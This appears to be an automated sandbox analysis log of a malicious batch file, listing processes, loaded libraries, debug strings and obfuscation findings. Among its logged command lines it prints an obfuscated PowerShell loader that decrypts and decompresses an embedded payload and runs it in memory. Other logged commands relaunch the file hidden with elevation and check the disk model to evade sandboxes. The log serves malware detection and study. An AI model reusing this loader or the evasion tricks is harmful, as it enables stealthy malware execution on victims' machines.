        Source: C:\Windows\System32\cmd.exeCode function: 4_2_000001B780BE3BB8 CreateToolhelp32Snapshot,Process32FirstW,OpenProcess,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,4_2_000001B780BE3BB8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\55961b9e-527e-4fad-9c53-2ed3bd8623c5
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_svn42pzs.1mz.ps1
        Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skf7iF4.bat" "
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\skf7iF4.bat" "
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\skf7iF4.bat" sgcCUaUFtA
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\findstr.exe "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ixMY($RTJl){ Invoke-Expression -Verbose '$lYya=[kQSkQykQstkQekQm.kQSkQekQckQukQrkQikQtkQykQ.kQCrkQykQpkQtokQgrkQakQphkQykQ.kQAekQskQ]:kQ:CkQrkQekQakQtekQ(kQ);'.Replace('kQ', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$lYya.M7ko7kd7ke=7k[7kSy7ks7kt7ke7km7k.7kS7ke7kc7ku7kri7kt7ky7k.C7kry7kp7kto7kg7kr7kap7kh7ky.7kCi7kp7kh7ke7krM7ko7kd7ke]7k:7k:C7kB7kC;'.Replace('7k', ''); Invoke-Expression -InformationAction Ignore '$lYya.PUPaUPdUPdiUPnUPg=UP[UPSUPyUPsUPtUPeUPmUP.UPSUPecUPuUPrUPitUPy.UPCUPryUPpUPtUPogUPrUPapUPhyUP.UPPUPaUPddUPiUPnUPgMUPoUPdeUP]UP::UPPUPKUPCUPS7UP;'.Replace('UP', ''); Invoke-Expression -Verbose '$lYya.KF4eF4yF4=[F4SF4ysF4tF4eF4mF4.F4CF4oF4nF4vF4eF4rtF4]F4:F4:FF4roF4mF4BaF4sF4eF464F4SF4trF4inF4g("6F4iF4nF4QTF4VF4f6F4kF4MF4fF4iF4uF49F40F4mF4wF4KaF4ZF48F4tDF482F4BF4yTF4DF4CF4HNF4RF4PsF4BFF42F4gF4fF4mFF4QF4=");'.Replace('F4', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$lYya.IcuVcu=cu[Scuycustcuecumcu.cuCcuocuncuvcuecurcut]cu:cu:cuFrcuomcuBcuascuecu6cu4Scutcuricungcu("OcuQcufcuEscuocuBxcu6cufcuucuHcuocuGcu2cuocu+cubrcu8curcuQ=cu=");'.Replace('cu', ''); $kxIY=$lYya.CreateDecryptor(); $uoEQ=$kxIY.TransformFinalBlock($RTJl, 0, $RTJl.Length); $kxIY.Dispose(); $lYya.Dispose(); $uoEQ;}function eaLU($RTJl){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$QqUU=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm(,$RTJl);'.Replace('gZ', ''); Invoke-Expression -WarningAction Inquire '$JLmq=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm;'.Replace('gZ', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$FcOM=NJVeJVwJV-OJVbJVjeJVcJVtJV JVSJVyJVsJVtJVeJVmJV.IJVOJV.JVCoJVmpJVrJVesJVsJViJVonJV.JVGZJVipJVSJVtJVrJVeaJVmJV($QqUU, 
[JVIJVOJV.CJVoJVmpJVrJVeJVsJVsJViJVoJVnJV.JVCJVomJVpJVrJVesJVsiJVoJVnMJVoJVdJVe]JV:JV:DJVecJVoJVmJVpJVreJVsJVs);'.Replace('JV', ''); $FcOM.CopyTo($JLmq); $FcOM.Dispose(); $QqUU.Dispose(); $JLmq.Dispose(); $JLmq.ToArray();}function asdm($RTJl,$dnWr){ Invoke-Expression -InformationAction Ignore -Verbose -Debug '$UMjh=[imSimyimstimeimm.imRimeimfimlimeimcimtimiimoimn.imAimsimseimmbimlimy]im:im:imLoimaimd([byte[]]$RTJl);'.Replace('im', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$mtQH=$UMjh.EIAnIAtIAryIAPIAoiIAnIAtIA;'.Replace('IA', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$mtQH.7yI7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnWr);'.Replace('7y', '');}function rfR($wdZq){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'YgRcXRGuMxdAM;gxWdtVB;oXRuvWNbW
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfile
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\more.com more
        Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: logoncli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptnet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cabinet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\more.com Section loaded: ulib.dll
        Source: C:\Windows\System32\more.com Section loaded: fsutilext.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: cabinet.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: skf7iF4.bat Static file information: File size 6302909 > 1048576
        Source: Binary string: kernel32.pdbUGP source: winlogon.exe, 00000011.00000003.1497625230.000001B927CE6000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdbUGP source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: d.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb0A5 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000001A.00000000.1542678836.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2511742250.000001F34CA40000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbcache source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdb source: winlogon.exe, 00000011.00000003.1496794921.000001B927CC5000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernel32.pdb source: winlogon.exe, 00000011.00000003.1497625230.000001B927CE6000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ntdll.pdbUGP source: winlogon.exe, 00000011.00000003.1496794921.000001B927CC5000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000001A.00000002.2510051300.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000000.1542643733.000001F34CA2B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: kernelbase.pdb source: winlogon.exe, 00000011.00000003.1497124336.000001B92983C000.00000004.00000001.00020000.00000000.sdmp
        Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000001A.00000000.1542720331.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2513139367.000001F34CA5B000.00000004.00000001.00020000.00000000.sdmp

        Data Obfuscation

        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfile
        Source: C:\Windows\System32\cmd.exe Code function: 4_3_000001B780BCC62D push rcx; retf 003Fh 4_3_000001B780BCC62E
        Source: C:\Windows\System32\conhost.exe Code function: 5_3_000002640730C62D push rcx; retf 003Fh 5_3_000002640730C62E
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FF88B2A00BD pushad ; iretd 12_2_00007FF88B2A00C1
        Source: C:\Windows\System32\more.com Code function: 16_3_00000234FE50C62D push rcx; retf 003Fh 16_3_00000234FE50C62E
        Source: C:\Windows\System32\winlogon.exe Code function: 17_3_000001B92787C62D push rcx; retf 003Fh 17_3_000001B92787C62E
        Source: C:\Windows\System32\lsass.exe Code function: 18_3_000002158AECC62D push rcx; retf 003Fh 18_3_000002158AECC62E
        Source: C:\Windows\System32\svchost.exe Code function: 19_3_000001E89FDDC62D push rcx; retf 003Fh 19_3_000001E89FDDC62E
        Source: C:\Windows\System32\dwm.exe Code function: 20_3_000001F08892C62D push rcx; retf 003Fh 20_3_000001F08892C62E
        Source: C:\Windows\System32\svchost.exe Code function: 21_3_000001AC86F5C62D push rcx; retf 003Fh 21_3_000001AC86F5C62E
        Source: C:\Windows\System32\svchost.exe Code function: 22_3_0000014785F9C62D push rcx; retf 003Fh 22_3_0000014785F9C62E
